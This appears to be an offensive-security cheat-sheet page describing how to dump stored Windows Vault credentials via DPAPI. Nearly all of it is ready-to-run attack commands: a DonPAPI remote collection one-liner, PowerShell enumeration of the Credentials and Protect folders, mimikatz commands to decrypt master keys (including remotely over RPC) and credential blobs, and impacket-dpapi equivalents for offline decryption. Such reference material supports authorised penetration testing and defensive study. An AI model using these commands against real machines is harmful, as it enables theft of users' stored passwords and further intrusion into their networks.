Skip to content

Dumping Credentials from Windows Vault

We may be able to retrieve credentials if Windows Vault credentials are stored some folders.

Automation

Using DonPAPI, we can dump credentials remotely.

donpapi collect -u 'username' -p 'password' -d example.local --dc-ip <target-ip> -t ALL --fetch-pvk

Manual Dumping

1. Enumerate Credentials

# Under %APPDATA% folder
Get-ChildItem C:\Users\<user>\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\<user>\AppData\Roaming\Microsoft\Credentials\

# Under %LOCALAPPDATA% folder
Get-ChildItem C:\Users\<user>\AppData\Local\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\<user>\AppData\Local\Microsoft\Credentials\

2. Dump Credential Information

mimikatz # dpapi::cred /in:C:\Users\<user>\AppData\Roaming\Microsoft\Credentials\123ABC...
# or
mimikatz # dpapi::cred /in:C:\Users\<user>\AppData\Local\Microsoft\Credentials\123ABC...

We can retrieve the guidMasterKey value that is used for the next section.

3. Decrypt MasterKey

The DPAPI keys are stored under %APPDATA%\Microsofr\Protect\ or %LOCALAPPDATA%\Microsoft\Protect\ folder. These keys are used for encrypting

# Under %APPDATA%
Get-ChildItem C:\Users\<user>\AppData\Roaming\Microsoft\Protect\
Get-ChildItem -Hidden C:\Users\<user>\AppData\Roaming\Microsoft\Protect\
dir C:\Users\<user>\AppData\Roaming\Microsoft\Protect\
Get-ChildItem C:\Users\<user>\AppData\Roaming\Microsoft\Protect\{SID}\
Get-ChildItem -Hidden C:\Users\<user>\AppData\Roaming\Microsoft\Protect\{SID}\
dir C:\Users\<user>\AppData\Roaming\Microsoft\Protect\{SID}\

# Under %LOCALAPPDATA%
Get-ChildItem C:\Users\<user>\AppData\Local\Microsoft\Protect\
Get-ChildItem -Hidden C:\Users\<user>\AppData\Local\Microsoft\Protect\
dir C:\Users\<user>\AppData\Local\Microsoft\Protect\
Get-ChildItem C:\Users\<user>\AppData\Local\Microsoft\Protect\{SID}\
Get-ChildItem -Hidden C:\Users\<user>\AppData\Local\Microsoft\Protect\{SID}\
dir  C:\Users\<user>\AppData\Local\Microsoft\Protect\{SID}\

Now decrypt the master keys:

# /rpc: Remotely decrypt the MasterKey
mimikatz # dpapi::masterkey /in:C:\Users\<user>\AppData\Roaming\Microsoft\Protect\{SID}\{STRING} /rpc

We can get the key value that is the decrypted Master Key.

Alternatively, we can use impacket-dpapi command in our attack machine. We need to download the protected file under the C:\Users\<user>\AppData\Roaming\Microsoft\Protect\<sid>\ in the target Windows machine.

impacket-dpapi masterkey -file <protected_file> -sid <user_sid> -password <password>

4. Dump Credentials

We can dump credentials using the collected Credential value and decrypted Master Key (domainkey).

# Specify '/<guidMasterKey>::<masterkey>'
mimikatz # dpapi::cred /in:C:\Users\<user>\AppData\Local\Microsoft\Credentials\123ABC... /01234567-890abcde...::abcdef...

Alternatively, we can use impacket-dpapi command in our attack machine. We need to download the credential file under the C:\Users\<user>\AppData\Roaming\Microsoft\Credentials in the target Windows machine.

impacket-dpapi credential -file <credential_file> -key <decrypted_key>

References